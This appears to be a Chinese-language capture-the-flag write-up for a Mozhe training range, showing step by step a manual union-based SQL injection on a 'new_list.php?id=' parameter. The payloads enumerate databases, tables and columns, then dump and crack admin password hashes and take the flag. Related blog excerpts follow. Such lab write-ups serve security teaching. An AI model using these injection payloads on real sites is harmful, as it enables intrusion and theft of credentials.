第一步:判斷注入點:
在瀏覽器的url介面輸入乙個單引號,發現頁面報錯,接著輸入
/new_list.php?id=tingjigonggao'--'發現頁面正常,由此該url存在字元型注入漏洞
第二步:判斷字段數
利用order by 語句,值為4頁面正常。
後面的可以用單引號,也可以用+來表示
/new_list.php?id=tingjigonggao' order by 4 --'第三步:查詢回顯點
利用union聯合查詢來尋找回顯點,union前面的語句需要報錯才能顯示我們輸入的
/new_list.php?id=tingjigonggaoo' union select 1,2,3,4 --'此時頁面會出現數字2和數字3,說明2和3的位置可以供我們利用
第四步:利用回顯點爆破資料庫
利用回顯點獲取資料庫的名稱和版本
由頁面返回結果之資料庫為:mozhe_discuz_stormgroup,版本:10.2.15-mariadb-log
/new_list.php?id=tingjigonggaoo' union select 1,database(),version(),4 --'接下來繼續查詢資料庫的個數利用limit這個函式,
/new_list.php?id=tingjigonggaoo' union select 1
,schema_name,3,
4 from information_schema.schemata limit 0,1
--+發現0增加到5的時候報錯,說明有五個資料庫分別為mysql,information_schema,mozhe_discuz_stormgroup,performance_schema,test
第五步:根據爆出的資料庫爆破表名
查詢表的個數(這裡以mozhe_discuz_stormgroup為例,如果想查詢其他資料庫表的資訊
只需要把資料庫名稱改下即可),0增加到2的時候報錯,說明這個資料庫有兩個表分別是
notice,stormgroup_member
/new_list.php?id=tingjigonggaoo' union select 1,2,table_name,4 from information_schema.tables where table_schema='mozhe_discuz_stormgroup' limit 0,1
--+第六步:根據資料庫的表爆破欄位名
(這裡以mozhe_discuz_stormgroup資料庫和stormgroup_member表為例)
/new_list.php?id=tingjigonggaoo' union select 1,2,column_name,4 from information_schema.columns where table_schema='mozhe_discuz_stormgroup' and table_name='stormgroup_member' limit 0,1
--+發現0增加到4的時候頁面報錯,說明這個表有三個字段分別是 id,name,password,status
**第七步:根據爆出的字段直接破解出其字段內容*
+爆出了兩個賬號:
mozhe-356f589a7df439f6f744ff19bb8092c0
mozhe-6a558d023dddea9d4f4b27f2e2061a08
站長直接進行解密
mozhe-dsan13
mozhe-762247
登陸第二個賬號成功進入管理後台拿到key
mozhec268db8e10e12a5fd62b9c13846
SQL手工注入漏洞測試 MySQL資料庫
判斷注入點,id 1 and 1 1正常,id 1 and 1 2報錯,發現存在sql注入 id 1 and 1 2 order by n n 1,2,3,4 發現有4列 判斷回顯id 1 and 1 2 union select 1,2,3,4 id 1 and 1 2 union select ...
SQL手工注入漏洞測試 MySQL資料庫
墨者學院的題 記一下通關經過 本題純屬練習手工,無任何過濾。sql手工注入漏洞測試 mysql資料庫 還有 的一篇iamsoscared大神的sqlmap詳細教程。點選開啟靶場環境,訪問題目 ok一進來就是登入框 試了一下登入框並沒有發現注入,到處點點看 發現登入框下面的公告的鏈結是?id 1,手工...
基礎Web漏洞 SQL注入入門 手工注入篇
sql是運算元據庫資料的結構化查詢語言,網頁的應用資料和後台資料庫中的資料進行互動時會採用sql。而sql注入是將web頁面的原url 表單域或資料報輸入的引數,修改拼接成sql語句,傳遞給web伺服器,進而傳給資料庫伺服器以執行資料庫命令。如web應用程式的開發人員對使用者所輸入的資料或cooki...